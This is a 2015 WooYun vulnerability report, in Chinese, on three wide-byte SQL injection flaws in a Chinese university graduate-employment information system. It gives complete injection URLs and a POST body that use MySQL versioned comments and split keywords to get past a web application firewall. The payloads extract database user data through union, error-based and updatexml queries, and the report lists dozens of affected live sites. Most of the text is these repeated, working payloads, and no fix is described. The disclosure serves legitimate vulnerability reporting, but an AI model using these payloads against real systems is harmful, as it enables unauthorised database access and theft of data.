当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0131838

漏洞标题:汉码高校毕业生就业信息系统宽字节注入三处/绕过WAF

相关厂商:深圳市汉码软件技术有限公司

漏洞作者: 路人甲

提交时间:2015-08-07 14:52

修复时间:2015-11-05 13:52

公开时间:2015-11-05 13:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-07: 细节已通知厂商并且等待厂商处理中
2015-08-07: 厂商已经确认,细节仅向厂商公开
2015-08-10: 细节向第三方安全合作伙伴开放
2015-10-01: 细节向核心白帽子及相关领域专家公开
2015-10-11: 细节向普通白帽子公开
2015-10-21: 细节向实习白帽子公开
2015-11-05: 细节向公众公开

简要描述:

3个宽字节,有点难度的注入,适合MYSQL大牛练手

详细说明:

其实我第一句想说这个系统的用户量的确是很大的。漏洞算起来也不是很多。
厂商是:版权所有 深圳市汉码软件技术有限公司
我们来看看第一处注入:
/file_download.php?search_keyword=&keyword_type=0&pg=7
一般来看SQLMAP是注不出咯,扫描器也跑不出,经过收工测试是宽字节的注入,

a1.png


因为过滤了union和select,所以我们可以用/*!50000union*/、/*!50000select*/这样来绕过WAF

http://**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0


a2.png


像这样的例子很多:

http://**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
http://**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
http://**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**/zs//file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**:84/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
http://**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
**.**.**.**/file_download.php?search_keyword=%df%27%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0


第二处注入:
/index_archives.php?search_keyword=1109059&search_type=1&actiontype=0 search_keyword参数也是存在宽字节注入

a3.png


还是用上门的方法来绕过WAF

http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0


案例还是蛮多:

http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
**.**.**.**/zs/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
**.**.**.**:9280/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
http://**.**.**.**/index_archives.php?search_keyword=%df%27/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,user(),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0


第三处注入是POST的:
/index_communicate.php
keywords=1%df'&searchtype=0&Submit2=%CB%D1++%CB%F7

a4.png


这个可以用updatexml形式来注入,select可以使用sel<>lect来绕过。
提交:keywords=1%df' a<>nd 1=(updatexml(1,concat(0x3a,(sel<>ect user())),1))%23&searchtype=0&Submit2=%CB%D1++%CB%F7 就可以注出user(),有些站点需要变动或者用其它方式注入,反正都是存在注入的

a5.png


存在漏洞的站点还是很多很多:

http://**.**.**.**/index_communicate.php
**.**.**.**:9280/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**//index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
**.**.**.**:84/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php
http://**.**.**.**/index_communicate.php

漏洞证明:

已证明!

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-07 13:50

厂商回复:

CNVD确认所述情况,已由CNVD通过软件生产厂商(或网站管理方)公开联系渠道向其邮件(和电话)通报,由其后续提供解决方案并协调相关用户单位处置。

最新状态:

暂无